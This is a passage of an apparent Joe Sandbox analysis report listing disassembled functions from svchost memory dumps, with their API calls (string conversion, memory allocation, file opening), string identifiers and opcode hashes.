                                                                • Instruction ID: 78328623b9b1248033fbc258c941b90d11de48933ad175ffdeeb319233562b8b
                                                                • Opcode Fuzzy Hash: f9e41d15f7de78c7c7a9a09fb5e2e5eda402558c9c52b3c7b7a9e4399ca61276
                                                                • Instruction Fuzzy Hash: 5921817930D68091FA799A91D4943E992F1B746FC0FC400259E2E4B795FF3DCB85A740
                                                                Function 00000173D0162780 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                • Opcode ID: deae8b2ba28c56d303df31542f47040e42c3e4a46138e759e1aaf1c128e49a55
                                                                • Instruction ID: baa5c5efe34a54eb9d61605fb70dafa9697e0c33b33e96cfd16ec89c3bd7229d
                                                                • Opcode Fuzzy Hash: deae8b2ba28c56d303df31542f47040e42c3e4a46138e759e1aaf1c128e49a55
                                                                • Instruction Fuzzy Hash: DB11BF35709F8186E6208F96FC4415AB7B4F788FE0F984228DB6A47B90EF38C9409300
                                                                Function 00000173D01BA480 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: 29168334428bd3c89460ca0a44bc26e6ba7efa86438a5e6a027f7a53120f7b51
                                                                • Instruction ID: 1ebfab2b1df188c3ae729799becd748afe3de2855c0f5c721210cb168a89c6f7
                                                                • Opcode Fuzzy Hash: 29168334428bd3c89460ca0a44bc26e6ba7efa86438a5e6a027f7a53120f7b51
                                                                • Instruction Fuzzy Hash: 5B115E3A714F048AEB10DFA0E8543E973B4F71AB98F840E21DA7D46BA4EB78C254D340
                                                                Function 00000173D0162830 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162705
                                                                  • Part of subcall function 00000173D01626D0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162718
                                                                  • Part of subcall function 00000173D01626D0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016273F
                                                                  • Part of subcall function 00000173D01626D0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016274C
                                                                • _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162865
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162870
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162886
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000173D0151F41), ref: 00000173D0162894
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$ByteCharMultiWide$_errno_wfopenmalloc
                                                                • String ID:
                                                                • API String ID: 26091681-0
                                                                • Opcode ID: 0375d0a80efc25c1632f5b2a13e08bbf5fe38608e71b0cbecf084b794a4d6a9c
                                                                • Instruction ID: 3b54c8b77c870b374065e46c71d3fdcfdeb76b7c2f60cc21b7751f106cfae0e6
                                                                • Opcode Fuzzy Hash: 0375d0a80efc25c1632f5b2a13e08bbf5fe38608e71b0cbecf084b794a4d6a9c
                                                                • Instruction Fuzzy Hash: 93F01239709E5542F9665B92ED442AED3B4AB49FD0FC94420DD2E0BF49EF6CC6465300
                                                                Function 00000173D01B9315 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: %u%.2s-%.2s-%.2s %.2s:%.2s:%.2s %.*s$GMT
                                                                • API String ID: 356670603-632690687
                                                                • Opcode ID: c139e50391b70ccb2fa4ff49b315b3c0ef2b79c9b06f4873976a75099094eb7b
                                                                • Instruction ID: 84033f5155db2605562988b7ba75820cb5c359edfe01e54feaf8fb267a69a663
                                                                • Opcode Fuzzy Hash: c139e50391b70ccb2fa4ff49b315b3c0ef2b79c9b06f4873976a75099094eb7b
                                                                • Instruction Fuzzy Hash: DB41813A21C68541FB328BA4D5903E9E7F5F746BC0FC44011EAAD46A95FBA8C742E740
                                                                Function 00000173D017F4D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _strdupstrcspn
                                                                • String ID: () {%*]\"
                                                                • API String ID: 3695213020-4142237831
                                                                • Opcode ID: 89d4a67e625d9b8a49ff68337f47ee4a115f86f08829ce9b1e7f958f16d99cf7
                                                                • Instruction ID: f2c935f268bf7c378e322a26527f0603874bb958a69bbf7d6a600e608bc8c2b3
                                                                • Opcode Fuzzy Hash: 89d4a67e625d9b8a49ff68337f47ee4a115f86f08829ce9b1e7f958f16d99cf7
                                                                • Instruction Fuzzy Hash: 6331C77521C65582FB309BA2E8403DAD3B0A794FD8FC80215D9BD466D5FB58C782A740
                                                                Function 00000173D01B9644 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=
                                                                • String ID: FALSE$TRUE
                                                                • API String ID: 356670603-1412513891
                                                                • Opcode ID: 03abd6730b94028f8763ce21799859eead7c6dadb3cf727f05930935d344efe6
                                                                • Instruction ID: db669fcef67412bf91b553f15db88c2081aca9f29e75efc0e92f896700324452
                                                                • Opcode Fuzzy Hash: 03abd6730b94028f8763ce21799859eead7c6dadb3cf727f05930935d344efe6
                                                                • Instruction Fuzzy Hash: 0A11373A718B5585EB229BA5E8403DDA3B1F346BC8FC00016DE1D57799EF69C686D340
                                                                Function 00000173D01A65C0 Relevance: 5.1, APIs: 4, Instructions: 117COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: freememchr
                                                                • String ID:
                                                                • API String ID: 3588846894-0
                                                                • Opcode ID: ecd64efe92de18348549a7f54997d043584ff7eec4dc6e9751064a17b2e88cd4
                                                                • Instruction ID: 9605410cbea67880ad9e7d5efb17052b3212c44c89b6a54298aa987c0af42a09
                                                                • Opcode Fuzzy Hash: ecd64efe92de18348549a7f54997d043584ff7eec4dc6e9751064a17b2e88cd4
                                                                • Instruction Fuzzy Hash: E341847930AB8491FE369F96E5043D9D2A5BB44FC0F9C45399E6D1BB84FB38D643A200
                                                                Function 00000173D01626D0 Relevance: 5.0, APIs: 4, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162705
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D0162718
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016273F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,00000173D0162847,?,?,?,00000173D0151F41), ref: 00000173D016274C
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                • String ID:
                                                                • API String ID: 2605342592-0
                                                                • Opcode ID: 931d6c35e9fe268eca5583942666c254eb2cd039136a9fc39b460f039c27a7a2
                                                                • Instruction ID: 31761be0ea6671d26b294de0320ec26b7de081701ff522448cfac19f8108c469
                                                                • Opcode Fuzzy Hash: 931d6c35e9fe268eca5583942666c254eb2cd039136a9fc39b460f039c27a7a2
                                                                • Instruction Fuzzy Hash: 62015639708B9081EA34DB9AF96015AB6B1BB89FD4F984235DE6D47F94EF38C5409700
                                                                Function 00000173D0182510 Relevance: 5.0, APIs: 4, Instructions: 44COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free$memset
                                                                • String ID:
                                                                • API String ID: 2717317152-0
                                                                • Opcode ID: 2b1dc2818ecf8dc806e4130d1acf5419a652ad905e6fe6ce4fc11dbb93dd343d
                                                                • Instruction ID: 380800acd5f407f14dc3bd2c808f2f9b863e02a2c5a9b54f39d2d48c7314a32e
                                                                • Opcode Fuzzy Hash: 2b1dc2818ecf8dc806e4130d1acf5419a652ad905e6fe6ce4fc11dbb93dd343d
                                                                • Instruction Fuzzy Hash: 78118932918B8082E710DF75D9803ACA3B0FBA9F88F405306DE9802629FF30C6D0C340
                                                                Function 00000173D01756A0 Relevance: 5.0, APIs: 4, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: f635f827b8e96118afdf7968be939b1854f014a7f653dba6dbc723d86cd3ecaa
                                                                • Instruction ID: 0c72e370bccd9185219d1a1a394e429d84543552d5d78cbc5de24b8cb0056b52
                                                                • Opcode Fuzzy Hash: f635f827b8e96118afdf7968be939b1854f014a7f653dba6dbc723d86cd3ecaa
                                                                • Instruction Fuzzy Hash: EE011E39619B5181FA64DB96E89439DA3B0B788FD0F881121EEAE07B55FF38C5429740
                                                                Function 00000173D0179650 Relevance: 5.0, APIs: 4, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179661
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D017966B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179675
                                                                  • Part of subcall function 00000173D01680A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000173D017978E,?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?), ref: 00000173D01680D7
                                                                  • Part of subcall function 00000173D01680A0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00000173D017978E,?,00000000,00000173D017EA60,?,?,?,?,?,?,00000000,?), ref: 00000173D01680F7
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000173D017EBCD,?,?,?,?,?,?,00000000,?,?,00000173D0153E76), ref: 00000173D0179690
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: cf8c19424e0a4b96fc0f2330f5a49ced331e330c04acc1dd072ecd1812284f7d
                                                                • Instruction ID: ad4da6e9e97061898799922e9d3725d0b8603cbc35be0b0ed39bba273d841ab5
                                                                • Opcode Fuzzy Hash: cf8c19424e0a4b96fc0f2330f5a49ced331e330c04acc1dd072ecd1812284f7d
                                                                • Instruction Fuzzy Hash: 34E0E539219815C1FF64AFA5DC942AC9330EB98F95FD412119D2E42165FF24CA8AD350